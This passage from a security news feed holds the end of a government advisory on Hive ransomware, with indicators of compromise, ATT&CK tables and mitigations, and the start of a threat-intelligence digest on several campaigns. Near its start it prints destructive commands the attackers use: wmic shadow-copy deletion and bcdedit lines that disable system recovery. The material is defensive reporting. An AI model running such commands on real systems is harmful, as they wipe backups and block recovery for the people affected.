			<p><span><span><span class="TechTextChar"><span><span>wmic.exe SHADOWCOPY /nointeractive</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>wmic.exe shadowcopy delete</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>bcdedit.exe /set {default} recoveryenabled no</span></span></span></span></span></p>
			</td>
		</tr></tbody></table><p> </p>

<table align="center" class="Table" width="100%"><caption><em>Table 3: Potential IOC IP Addresses as of November 2022</em></caption>
	<caption><b>Note</b>: Some of these observed IP addresses are more than a year old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action like blocking.</caption>
	<tbody><tr><td colspan="2">
			<p><span><span><a name="_Hlk118725638"><b>Potential IOC IP Addresses for Compromise or Exfil:</b></a></span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>84.32.188[.]57</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>84.32.188[.]238</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>93.115.26[.]251</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>185.8.105[.]67</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>181.231.81[.]239</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>185.8.105[.]112</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>186.111.136[.]37</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>192.53.123[.]202</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>158.69.36[.]149</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>46.166.161[.]123</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>108.62.118[.]190</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>46.166.161[.]93</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>185.247.71[.]106</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>46.166.162[.]125</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>5.61.37[.]207</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>46.166.162[.]96</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>185.8.105[.]103</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>46.166.169[.]34</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>5.199.162[.]220</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>93.115.25[.]139</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>5.199.162[.]229</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>93.115.27[.]148</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>89.147.109[.]208</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>83.97.20[.]81</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>5.61.37[.]207</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>5.199.162[.]220</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>5.199.162[.]229;</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>46.166.161[.]93</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>46.166.161[.]123;</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>46.166.162[.]96</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>46.166.162[.]125</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>46.166.169[.]34</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>83.97.20[.]81</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>84.32.188[.]238</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>84.32.188[.]57</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>89.147.109[.]208</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>93.115.25[.]139;</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>93.115.26[.]251</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>93.115.27[.]148</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>108.62.118[.]190</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>158.69.36[.]149/span&gt;</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>181.231.81[.]239</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>185.8.105[.]67</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>185.8.105[.]103</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>185.8.105[.]112</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>185.247.71[.]106</span></span></p>
			</td>
		</tr><tr><td>
			<p align="center"><span><span>186.111.136[.]37</span></span></p>
			</td>
			<td>
			<p align="center"><span><span>192.53.123[.]202</span></span></p>
			</td>
		</tr></tbody></table><p> </p>

<h4><strong>MITRE ATT&amp;CK TECHNIQUES</strong></h4>

<p>See table 4 for all referenced threat actor tactics and techniques listed in this advisory.</p>

<table align="center" width="100%"><caption>Table 4: Hive Actors ATT&amp;CK Techniques for Enterprise</caption>
	<tbody><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><b><u><span>Initial Access</span></u></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><b><span>Technique Title</span></b></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><b><span>ID</span></b></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><b><span>Use</span></b></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span>External Remote Services</span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1133/">T1133</a></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Hive actors gain access to victim networks by using single factor logins via RDP, VPN, and other remote network connection protocols.</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span>Exploit Public-Facing Application</span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1190/">T1190</a></span></span></p>
			</td>
			<td valign="top">
			<p><span><span>Hive actors gain access to victim network by exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-42321.</span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span>Phishing</span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1566/001/">T1566.001</a></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Hive actors gain access to victim networks by distributing phishing emails with malicious attachments.</span></span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><b><u><span>Execution</span></u></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><b><span>Technique Title</span></b></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><b><span>ID</span></b></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><b><span>Use</span></b></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span>Command and Scripting Interpreter</span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1059/">T1059</a></span></span></p>
			</td>
			<td valign="top">
			<p><span><span>Hive actors looks to stop the volume shadow copy services and remove all existing shadow copies via <span class="TechTextChar"><span><span>vssadmin</span></span></span> on command line or PowerShell.</span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><b><u><span>Defense Evasion</span></u></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><b><span>Technique Title</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>ID</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>Use</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Indicator Removal on Host</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1070/">T1070</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Hive actors delete Windows event logs, specifically, the System, Security and Application logs.</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Modify Registry</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1112/">T1112</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span><span>Hive actors set registry values for </span><span class="TechTextChar"><span><span>DisableAntiSpyware</span></span></span><span> and </span><span class="TechTextChar"><span><span>DisableAntiVirus</span></span></span><span> to </span><span class="TechTextChar"><span><span>1</span></span></span><span>.</span></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Impair Defenses</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1562/001/">T1562</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span><span>Hive actors seek processes related to backups, antivirus/anti-spyware, and file copying and terminates those processes to facilitate file encryption.</span></span></span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><b><u><span>Exfiltration</span></u></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><b><span>Technique Title</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>ID</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>Use</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Transfer Data to Cloud Account</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1537/">T1537</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Hive actors exfiltrate data from victims, using a possible combination of Rclone and the cloud storage service <span class="TechTextChar"><span><span>Mega.nz</span></span></span>.</span></span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><span><b><u><span>Impact</span></u></b></span></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><span><b><span>Technique Title</span></b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"> </p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><span><b><span>Use</span></b></span></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Data Encrypted for Impact</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1486/">T1486</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Hive actors deploy a ransom note <span class="TechTextChar"><span><span>HOW_TO_DECRYPT.txt</span></span></span> into each affected directory which states the <span class="TechTextChar"><span><span>*.key</span></span></span> file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered.</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Inhibit System Recovery</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v12/techniques/T1490/">T1490</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span><span>Hive actors looks to stop the volume shadow copy services and remove all existing shadow copies via </span><span class="TechTextChar"><span><span>vssadmin</span></span></span><span> via command line or PowerShell.</span></span></span></span></p>
			</td>
		</tr></tbody></table><h3>Mitigations</h3><p>FBI, CISA, and HHS recommend organizations, particularly in the HPH sector, implement the following to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Hive ransomware:</p>

<ul><li>Verify Hive actors no longer have access to the network.</li>
	<li>Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities</a>. Consider leveraging a centralized patch management system to automate and expedite the process.</li>
	<li>Require <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf">phishing-resistant MFA</a> for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.</li>
	<li>If used, secure and monitor RDP.
	<ul><li>Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure.</li>
		<li>After assessing risks, if you deem RDP operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse.</li>
		<li>If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.</li>
		<li>Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.</li>
		<li>Be sure to properly configure devices and enable security features.</li>
		<li>Disable ports and protocols not used for business purposes, such as RDP Port <line>3389</line>/TCP.</li>
	</ul></li>
	<li>Maintain offline backups of data, and regularly maintain backup and restoration. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.</li>
	<li>Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure. Ensure your backup data is not already infected.,</li>
	<li>Monitor cyber threat reporting regarding the publication of compromised VPN login credentials and change passwords/settings if applicable.</li>
	<li>Install and regularly update anti-virus or anti-malware software on all hosts.</li>
	<li>Enable PowerShell Logging including module logging, script block logging and transcription.</li>
	<li>Install an enhanced monitoring tool such as Sysmon from Microsoft for increased logging.</li>
	<li>Review the following additional resources.
	<ul><li>The joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a> provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.</li>
		<li>The Cybersecurity and Infrastructure Security Agency-Multi-State Information Sharing &amp; Analysis Center <a href="https://www.cisa.gov/stopransomware/ransomware-guide">Joint Ransomware Guide</a> covers additional best practices and ways to prevent, protect, and respond to a ransomware attack.</li>
		<li><a href="https://www.cisa.gov/stopransomware">StopRansomware.gov</a> is the U.S. Government’s official one-stop location for resources to tackle ransomware more effectively.</li>
	</ul></li>
</ul><p>If your organization is impacted by a ransomware incident, FBI, CISA, and HHS recommend the following actions.</p>

<ul><li><strong>Isolate the infected system</strong>. Remove the infected system from all networks, and disable the computer’s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected.</li>
	<li><strong>Turn off other computers and devices</strong>. Power-off and segregate (i.e., remove from the network) the infected computer(s). Power-off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering-off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.</li>
	<li><strong>Secure your backups</strong>. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.</li>
</ul><p>In addition, FBI, CISA, and HHS urge all organizations to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.</p>

<h4><strong>Preparing for Cyber Incidents</strong></h4>

<ul><li><strong>Review the security posture of third-party vendors and those interconnected with your organization</strong>. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.</li>
	<li><strong>Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs</strong> under an established security policy.</li>
	<li><strong>Document and monitor external remote connections</strong>. Organizations should document approved solutions for remote management and maintenance, and immediately investigate if an unapproved solution is installed on a workstation.</li>
	<li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).</li>
</ul><h4><strong>Identity and Access Management</strong></h4>

<ul><li><strong>Require all accounts</strong> with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with <a href="https://pages.nist.gov/800-63-3/">National Institute of Standards and Technology (NIST) standards</a> for developing and managing password policies.

	<ul><li>Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.</li>
		<li>Store passwords in hashed format using industry-recognized password managers.</li>
		<li>Add password user “salts” to shared login credentials.</li>
		<li>Avoid reusing passwords.</li>
		<li>Implement multiple failed login attempt account lockouts.</li>
		<li>Disable password “hints.”</li>
		<li>Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.<br>
		Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.</li>
		<li>Require administrator credentials to install software.</li>
	</ul></li>
	<li><strong>Require phishing-resistant multifactor authentication</strong> for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.</li>
	<li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts.</li>
	<li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege.</li>
	<li><strong>Implement time-based access for accounts set at the admin level and higher</strong>. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. </li>
</ul><h4><strong>Protective Controls and Architecture</strong></h4>

<ul><li><strong>Segment networks</strong> to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.</li>
	<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool</strong>. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.</li>
	<li>Install, regularly update, and enable real time detection for antivirus software on all hosts.</li>
</ul><p>Vulnerability and Configuration Management</p>

<ul><li><strong>Consider adding an email banner to emails</strong> received from outside your organization.</li>
	<li><strong>Disable command-line and scripting activities and permissions</strong>. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.</li>
	<li><strong>Ensure devices are properly configured and that security features are enabled</strong>. </li>
	<li><strong>Restrict Server Message Block (SMB) Protocol within the network to only access necessary servers and remove or disable outdated versions of SMB</strong> (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.</li>
</ul><h4><strong>REFERENCES</strong></h4>

<ul><li><a href="http://www.stopransomware.gov/">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
	<li>Resource to mitigate a ransomware attack: <a href="https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf">CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide</a>.</li>
	<li>No-cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/">Ransomware Readiness Assessment</a>.</li>
</ul><h4><strong>INFORMATION REQUESTED</strong></h4>

<p>The FBI, CISA, and HHS do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered. However, the FBI, CISA, and HHS understand that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers. Regardless of whether you or your organization decide to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to your <a href="https://www.fbi.gov/contact-us/field-offices">local FBI field office</a>, or to CISA at <a href="https://us-cert.cisa.govmailto:report@cisa.gov/">report@cisa.gov</a> or (888) 282-0870. Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under US law, and prevent future attacks. </p>

<p>The FBI may seek the following information that you determine you can legally share, including:</p>

<ul><li>Recovered executable files</li>
	<li>Live random access memory (RAM) capture</li>
	<li>Images of infected systems</li>
	<li>Malware samples</li>
	<li>IP addresses identified as malicious or suspicious</li>
	<li>Email addresses of the attackers</li>
	<li>A copy of the ransom note</li>
	<li>Ransom amount</li>
	<li>Bitcoin wallets used by the attackers</li>
	<li>Bitcoin wallets used to pay the ransom</li>
	<li>Post-incident forensic reports</li>
</ul><h4>DISCLAIMER</h4>

<p>The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.</p>

<p> </p>
            <h3>Revisions</h3>
		<ul><li>Initial Version: November 17, 2022</li>		</ul><hr><div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anomali Cyber Watch: Daixin Team Ransoms Healthcare Sector, Earth Berberoka Breaches Casinos for Data, Windows Affected by Bring-Your-Own-Vulnerable-Driver Attacks, and More]]></title>
<description><![CDATA[The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, DDoS, Infostealers, Iran, Ransomware, and Russia. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential m...]]></description>
<link>https://tsecurity.de/de/1675097/it-security-nachrichten/anomali-cyber-watch-daixin-team-ransoms-healthcare-sector-earth-berberoka-breaches-casinos-for-data-windows-affected-by-bring-your-own-vulnerable-driver-attacks-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1675097/it-security-nachrichten/anomali-cyber-watch-daixin-team-ransoms-healthcare-sector-earth-berberoka-breaches-casinos-for-data-windows-affected-by-bring-your-own-vulnerable-driver-attacks-and-more/</guid>
<pubDate>Tue, 25 Oct 2022 19:03:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: <b>APT, China, DDoS, Infostealers, Iran, Ransomware,</b> and <b>Russia</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.</p>

<p><img src="https://www.anomali.com/images/uploads/blog/acw-102522.png"><br><b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b></p>

<h2>Trending Cyber News and Threat Intelligence</h2>

<div class="trending-threat-article">
<h3><a href="https://www.cisa.gov/uscert/ncas/alerts/aa22-294a" target="_blank">Alert (AA22-294A) #StopRansomware: Daixin Team</a></h3>

<p>(published: October 21, 2022)</p>

<p>Daixin Team is a double-extortion ransomware group that has been targeting US businesses, predominantly in the healthcare sector. Since June 2022, Daixin Team has been encrypting electronic health record services, diagnostics services, imaging services, and intranet services. The group has exfiltrated personal identifiable information and patient health information. Typical intrusion starts with initial access through virtual private network (VPN) servers gained by exploitation or valid credentials derived from prior phishing. They use SSH and RDP for lateral movement and target VMware ESXi systems with ransomware based on leaked Babuk Locker source code.<br><b>Analyst Comment:</b> Network defenders should keep organization’s VPN servers up-to-date on security updates. Enable multifactor authentication (MFA) on your VPN server and other critical accounts (administrative, backup-related, and webmail). Restrict the use of RDP, SSH, Telnet, virtual desktop and similar services in your environment.<br><b>MITRE ATT&amp;CK:</b> <a href="https://ui.threatstream.com/ttp/947138" target="_blank">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/947231" target="_blank">[MITRE ATT&amp;CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947222" target="_blank">[MITRE ATT&amp;CK] Account Manipulation - T1098</a> | <a href="https://ui.threatstream.com/ttp/3905348" target="_blank">[MITRE ATT&amp;CK] OS Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/3904549" target="_blank">[MITRE ATT&amp;CK] Remote Service Session Hijacking - T1563</a> | <a href="https://ui.threatstream.com/ttp/3904552" target="_blank">[MITRE ATT&amp;CK] Use Alternate Authentication Material - T1550</a> | <a href="https://ui.threatstream.com/ttp/3905082" target="_blank">[MITRE ATT&amp;CK] Exfiltration Over Web Service - T1567</a> | <a href="https://ui.threatstream.com/ttp/2402531" target="_blank">[MITRE ATT&amp;CK] Data Encrypted for Impact - T1486</a><br><b>Tags:</b> actor:Daixin Team, malware-type:Ransomware, PHI, SSH, RDP, Rclone, Ngrok, target-sector:Health Care NAICS 62, ESXi, VMware, Windows</p>
</div>

<div class="trending-threat-article">
<h3><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware" target="_blank">Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool</a></h3>

<p>(published: October 21, 2022)</p>

<p>Symantec detected a new custom data exfiltration tool used in a number of BlackByte ransomware attacks. This infostealer, dubbed Exbyte, performs anti-sandbox checks and proceeds to exfiltrate selected file types to a hardcoded Mega account. BlackByte ransomware-as-a-service operations were first uncovered in February 2022. The group’s recent attacks start with exploiting public-facing vulnerabilities of ProxyShell and ProxyLogon families. BlackByte removes Kernel Notify Routines to bypass Endpoint Detection and Response (EDR) products. The group uses AdFind, AnyDesk, Exbyte, NetScan, and PowerView tools and deploys BlackByte 2.0 ransomware payload.<br><b>Analyst Comment:</b> It is crucial that your company ensures that servers are always running the most current software version. Your company should have policies in place in regards to the proper configurations needed for your servers in order to conduct your business needs safely. Additionally, always practice defense-in-depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe).<br><b>MITRE ATT&amp;CK:</b> <a href="https://ui.threatstream.com/ttp/947138" target="_blank">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/2402531" target="_blank">[MITRE ATT&amp;CK] Data Encrypted for Impact - T1486</a> | <a href="https://ui.threatstream.com/ttp/2402543" target="_blank">[MITRE ATT&amp;CK] Virtualization/Sandbox Evasion - T1497</a><br><b>Tags:</b> actor:BlackByte, malware-type:Data exfiltration tool, detection:blackbyte_exfil, actor:Hecamede, detection:Ransom.Blackbyte, malware-type:Ransomware, detection:Infostealer.Exbyte, malware-type:Infostealer, Go, ProxyShell, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, ProxyLogon, CVE-2021-26855, CVE-2021-27065</p>
</div>

<div class="trending-threat-article">
<h3><a href="https://www.welivesecurity.com/2022/10/20/domestic-kitten-campaign-spying-iranian-citizens-furball-malware/" target="_blank">Domestic Kitten Campaign Spying on Iranian Citizens with New FurBall Malware</a></h3>

<p>(published: October 20, 2022)</p>

<p>ESET researchers identified a new version of FurBall malware used by the Iran-sponsored Domestic Kitten (aka APT-C-50) group. Since June 2021, this Android malware has been distributed masquerading as a translation app. It is a part of mobile surveillance operations against Iranian citizens since 2016. The new FurBall version added obfuscation in class names, method names, some strings, logs, and server URI paths. The app is only asking to access contacts as the malware functionality was limited to bare minimum: exfiltrate contact list, get accessible files from external storage, get list of user accounts synced with device, list installed apps, and obtain basic information about the device.<br><b>Analyst Comment:</b> Only install your Android applications from the Official Google Play Store. Domestic Kitten displays the Play Store logo on their fake website, but the malicious app is not present in Play Store. Organizations that publish applications for their customers are invited to use Anomali Premium Digital Risk Protection to discover rogue, malicious apps impersonating your brand that security teams typically do not search or monitor.<br><b>Tags:</b> actor:Domestic Kitten, actor:APT-C-50, detection:FurBall, detection:Android/Spy.Agent, KidLogger, Android, APT, Iran, target-country:IR, source-country:IR, Surveillance</p>
</div>

<div class="trending-threat-article">
<h3><a href="https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/" target="_blank">DiceyF Deploys GamePlayerFramework in Online Casino Development Studio</a></h3>

<p>(published: October 17, 2022)</p>

<p>China-sponsored cyberespionage group dubbed Earth Berberoka (aka DiceyF, Operation DRBControl) is targeting online casino development and operations environments in Hong Kong and Southeast Asia, according to Kaspersky researchers. Earth Berberoka used a framework called GamePlayerFramework. The attackers were able to sign their malware with the potentially-stolen certificate from a development studio of the Mango messenger. GamePlayerFramework avoids hooks by duplicating legitimate DLLs and then referring functions in copies. The group’s persistence techniques changed over time: creating new service, then scheduled tasks, and, finally, RasMan service. The Tifa branch of the framework first deployed in November 2021, included only a downloader and a core module. In 2022, the group moved to the Yuna branch, which includes a downloader, plugins, and various PuppetLoader components.<br><b>Analyst Comment:</b> Earth Berberoka is a sophisticated group with evolving techniques, but it seems to not care much about attribution. Lack of obfuscation in GamePlayerFramework makes it easier to use detection methods such as YARA rules.<br><b>MITRE ATT&amp;CK:</b> <a href="https://ui.threatstream.com/ttp/947205" target="_blank">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947137" target="_blank">[MITRE ATT&amp;CK] Supply Chain Compromise - T1195</a> | <a href="https://ui.threatstream.com/ttp/2402543" target="_blank">[MITRE ATT&amp;CK] Virtualization/Sandbox Evasion - T1497</a> | <a href="https://ui.threatstream.com/ttp/947127" target="_blank">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947142" target="_blank">[MITRE ATT&amp;CK] Process Injection - T1055</a> | <a href="https://ui.threatstream.com/ttp/3905036" target="_blank">[MITRE ATT&amp;CK] 